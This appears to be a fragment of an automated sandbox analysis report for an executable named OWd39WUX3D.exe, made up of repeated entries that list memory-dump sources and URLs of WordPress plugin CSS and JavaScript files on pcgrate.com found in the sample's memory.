              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
